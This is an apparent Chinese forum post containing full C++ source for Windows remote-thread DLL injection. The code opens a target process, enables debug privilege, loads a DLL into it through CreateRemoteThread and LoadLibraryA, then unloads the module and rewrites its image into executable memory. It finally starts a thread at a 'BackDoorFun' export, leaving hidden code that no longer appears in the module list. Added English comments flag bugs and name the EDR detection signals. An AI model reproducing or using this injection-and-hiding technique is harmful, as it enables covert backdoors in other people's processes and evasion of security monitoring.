本帖最后由 大灰狼 于 2014-10-15 10:27 编辑
请见代码分析，实现远程线程注入。
- #include "stdafx.h"
- #include "windows.h"
- #include "stdio.h"
- #include "Psapi.h"
- #include "Tlhelp32.h"
-
-
- //获得加载的DLL模块的信息,主要包括模块基地址和模块大小
- // Finds the module whose full path equals Dllfullname in the module list of
- // process ProcessID (Toolhelp snapshot) and leaves its MODULEENTRY32 in Thread,
- // so the caller can read modBaseAddr / modBaseSize. Despite the name this
- // returns *module* information, not thread information.
- // The caller must set Thread.dwSize before calling (Module32First requires it).
- // Returns TRUE on a path match, FALSE on snapshot/enumeration failure or no match.
- // NOTE(review): hthSnapshot is never closed on any return path (handle leak), and
- // CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE rather than
- // NULL, so the NULL test below does not detect a failed snapshot.
- BOOL GetThreadInformation(DWORD ProcessID,char* Dllfullname,MODULEENTRY32 &Thread)
- {
- HANDLE hthSnapshot = NULL;
- // Snapshot every module mapped in the given process.
- hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID);
- if (hthSnapshot == NULL)
- return FALSE;
- // Read the first entry of the module list.
- BOOL bMoreMods = Module32First(hthSnapshot, &Thread);
- if (bMoreMods == FALSE)
- return FALSE;
- // Walk the list until an entry's full path matches the requested DLL.
- for (;bMoreMods; bMoreMods = Module32Next(hthSnapshot, &Thread))
- {
- if (strcmp(Thread.szExePath, Dllfullname) == 0)
- break;
- }
- // Re-compare: if the loop ran off the end, Thread holds whatever the last
- // successful read left, so a match must be confirmed rather than assumed.
- if (strcmp(Thread.szExePath, Dllfullname) == 0)
- return TRUE;
- else
- return FALSE;
-
- }
- //调整进程权限
- // Enables the privilege named lpPrivilegeName on the access token of hProcess
- // (the process handle passed in). Returns FALSE if the token cannot be opened,
- // the privilege name cannot be resolved, or AdjustTokenPrivileges fails.
- // NOTE(review): hToken is never closed (handle leak). Also, AdjustTokenPrivileges
- // returns TRUE even when the token does not hold the privilege (it then sets
- // GetLastError() to ERROR_NOT_ALL_ASSIGNED), so TRUE here does not prove the
- // privilege is actually enabled.
- BOOL AdjustPrivileges(HANDLE hProcess,LPCTSTR lpPrivilegeName)
- {
- //******************************************************
- // Adjust process privileges
- //******************************************************
- HANDLE hToken;
- TOKEN_PRIVILEGES tkp;
- // Open the process token with rights to query and adjust privileges.
- if (!::OpenProcessToken(hProcess,
- TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
- return FALSE;
- // Resolve lpPrivilegeName to its LUID on the local system.
- if(!::LookupPrivilegeValue(NULL,
- lpPrivilegeName,
- &tkp.Privileges[0].Luid))
- return FALSE;
-
- tkp.PrivilegeCount = 1;
- tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
- // Apply the single privilege change; the previous state is not requested.
- if(!::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
- (PTOKEN_PRIVILEGES) NULL, 0))
- return FALSE;
- return TRUE;
- }
- //注入DLL部分
- // Classic remote-thread DLL injection: writes the DLL path into the target's
- // address space and starts a remote thread at LoadLibraryA with that address as
- // its argument, so the target loads the DLL itself.
- // Returns FALSE if the allocation, the write, the LoadLibraryA lookup, or thread
- // creation fails; TRUE as soon as the remote thread has been created (it does
- // not wait for LoadLibraryA to finish; the caller relies on a Sleep for that).
- // Defender note: each step here is a well-known detection signal for EDR and
- // ETW-based monitoring: a cross-process RWX allocation, a cross-process memory
- // write, and a remote thread whose start address is LoadLibraryA. The same
- // applies to the CreateRemoteThread calls in UnistallDll and main below.
- // NOTE(review): hRemoteThread is never closed and pDllName is never released in
- // the target (VirtualFreeEx), so both leak.
- BOOL InjectRemoteProcess(HANDLE hProcess,char* Dllfullname)
- {
-
- // Reserve+commit a buffer in the target large enough for the NUL-terminated path.
- PSTR pDllName=NULL;
- if((pDllName=(PSTR)::VirtualAllocEx(hProcess,
- NULL,
- strlen(Dllfullname)+1,
- MEM_COMMIT|MEM_RESERVE,
- PAGE_EXECUTE_READWRITE))==NULL)
- return FALSE;
-
- // Copy the path string (including its terminator) into that buffer.
- BOOL writecode;
- if((writecode=::WriteProcessMemory(hProcess,
- pDllName,
- Dllfullname,
- strlen(Dllfullname)+1,
- NULL))==0)
- return FALSE;
-
- // Resolve LoadLibraryA in this process's Kernel32.dll; using that address in the
- // target assumes Kernel32 is mapped at the same base there (same bitness).
- PTHREAD_START_ROUTINE pfnThreadRtn =
- (PTHREAD_START_ROUTINE)GetProcAddress(
- GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
- if (pfnThreadRtn== NULL)
- return FALSE;
- // Start the remote thread: LoadLibraryA(pDllName) runs inside the target.
- HANDLE hRemoteThread=NULL;
- if((hRemoteThread=::CreateRemoteThread(hProcess,
- NULL,
- 0,
- pfnThreadRtn,
- pDllName, // LoadLibraryA's argument: the address of the path string inside the target; several arguments would have to be packed into one struct
- 0,
- NULL))==NULL)
- return FALSE;
- return TRUE;
- }
- //卸载DLL
- // Unloads a module from the target by running FreeLibrary(Address) on a remote
- // thread, where Address is the module's base (its HMODULE). Waits for the remote
- // thread to finish and closes its handle. Returns FALSE if FreeLibrary cannot be
- // resolved or the thread cannot be created.
- // NOTE(review): FreeLibrary's own result (the thread's exit code) is never
- // inspected, so TRUE only means the thread ran, not that the module was unmapped.
- // The same Kernel32.dll same-base assumption as in InjectRemoteProcess applies.
- BOOL UnistallDll(HANDLE hProcess,BYTE * Address)
- {
-
- // Resolve FreeLibrary in the local Kernel32.dll.
- HANDLE hThread = NULL;
- PTHREAD_START_ROUTINE pfnThreadRtn =
- (PTHREAD_START_ROUTINE)GetProcAddress(
- GetModuleHandle("Kernel32.dll"), "FreeLibrary");
- if (pfnThreadRtn == NULL)
- return FALSE;
- // Run FreeLibrary(Address) on a remote thread in the target.
- hThread = ::CreateRemoteThread(hProcess,
- NULL,
- 0,
- pfnThreadRtn,
- Address,
- 0,
- NULL);
- if (hThread == NULL)
- return FALSE;
- // Block until the remote thread has terminated.
- ::WaitForSingleObject(hThread, INFINITE);
- // Release the thread handle.
- ::CloseHandle(hThread);
- return TRUE;
-
- }
-
- // Hard-coded targets: pid is the process to inject into and BackDoorFun is the
- // offset (RVA) of the DLL's exported function, both specific to the author's
- // session and build (the PID changes every run; the RVA changes whenever the DLL
- // is rebuilt).
- #define pid 3844
- #define BackDoorFun 0x1014// address (RVA) of the exported function inside the DLL module
- // Driver: injects dll.dll (from the current directory) into process `pid` via
- // LoadLibraryA, copies the loaded module image out of the target, unloads it with
- // FreeLibrary, re-allocates the same region at the old base, writes the saved
- // image back, and finally starts a remote thread at base+BackDoorFun. The result
- // is executable code in the target that no longer appears in its module list.
- // Defender note: that final state, a thread whose start address lies in
- // executable memory not backed by any loaded module or file, is a primary
- // detection heuristic for memory scanners and EDR, as is the preceding
- // RWX VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence.
- // NOTE(review): no handle (hRemoteProcess, hNewThread) and no heap buffer
- // (`buffer`) is ever released, and every early return leaks them. The return
- // code is 0 on every path, so a caller cannot tell success from failure.
- int main(int argc, char* argv[])
- {
- // Fixed 255-byte buffers for the DLL path. GetCurrentDirectory's return value is
- // not checked and strcat is unbounded, so a long current directory leaves
- // Dllfullname unset or overruns it.
- char Dllfullname[255];
- char Dllname[255];
- // Open the target process with full access.
- HANDLE hRemoteProcess=NULL;
- if((hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS,
- FALSE,
- pid))==NULL)
- {
- printf("OpenProcess faile!!");
- return 0;
- }
-
- // Enable SeDebugPrivilege on the token of the process handle just opened.
- BOOL Adjust=AdjustPrivileges(hRemoteProcess,SE_DEBUG_NAME);
- if(Adjust==FALSE)
- {
- printf("Adjust process Privileges faile!!\n");
- return 0;
- }
-
- // Build the DLL's full path: <current directory>\dll.dll
- strcpy(Dllname,"dll.dll");
- ::GetCurrentDirectory(255,Dllfullname);
- strcat(Dllfullname,"\\");
- strcat(Dllfullname,Dllname);
-
- BOOL Res=InjectRemoteProcess(hRemoteProcess,Dllfullname);
- if(Res==FALSE)
- {
- printf("Inject Faile!!\n");
- return 0;
- }
-
- // Wait for the remote LoadLibraryA thread to run; otherwise the injected DLL is
- // not yet in the module list. (A fixed Sleep is a race, not synchronization.)
- ::Sleep(300);
-
- // Locate the freshly loaded module (base address and size). RemoteTheadAddress
- // receives a BOOL despite its name; the stray second semicolon is harmless.
- DWORD RemoteTheadAddress=0;
- MODULEENTRY32 Thread = {sizeof(Thread)};;
- RemoteTheadAddress=GetThreadInformation(pid,Dllfullname,Thread);
- if(RemoteTheadAddress==0)
- {
- printf("Get RemoteTheadAddress Faile!!\n");
- return 0;
- }
-
- // Allocate a local buffer and copy the whole mapped DLL image out of the target.
- // NOTE(review): ReadProcessMemory's result and `read` are never checked, and
- // `buffer` is never delete[]'d.
- char *buffer=new char[Thread.modBaseSize+1];
- DWORD read;
- ::ReadProcessMemory(hRemoteProcess,
- Thread.modBaseAddr,// base address of the loaded DLL module
- buffer,
- Thread.modBaseSize,// size of the loaded DLL image
- &read);
- // Unload the DLL in the target so it disappears from the module list.
- BOOL Unstall=UnistallDll(hRemoteProcess,Thread.modBaseAddr);
- if(Unstall==FALSE)
- {
- printf("Unistall dll Faile!!!\n");
- return 0;
- }
- // Re-allocate virtual memory in the target, starting at the original module base.
- LPVOID Alloc;
- Alloc=::VirtualAllocEx(hRemoteProcess,Thread.modBaseAddr,Thread.modBaseSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
- if(Alloc== NULL)
- {
- printf("VirtualAllocEx Failed!!\n");
- return 0;
- }
-
- // Write the saved image back into the re-allocated region.
- BOOL Writer;DWORD Written;
- Writer=::WriteProcessMemory(hRemoteProcess,Thread.modBaseAddr,buffer,Thread.modBaseSize,&Written);
- if(Writer==0)
- {
- printf("WriteProcessMemory Failed!!\n");
- return 0;
- }
- // Start a new thread in the target at the exported function, which now lives in
- // a region with no DLL module backing it.
- HANDLE hNewThread=NULL;
- if((hNewThread=::CreateRemoteThread(hRemoteProcess,
- NULL,
- 0,
- (PTHREAD_START_ROUTINE)(Thread.modBaseAddr+BackDoorFun),// base address of the data placed into the process (Thread.modBaseAddr) + entry-point RVA of the DLL export
- NULL, // the export's argument address would go here; for simplicity this export takes none, arguments would have to be written into the process space first, the same way the DLL path was
- 0,
- NULL))==NULL)
- {
- printf("CreateNewThread faile!!\n");
- return 0;
- }
- return 0;
- }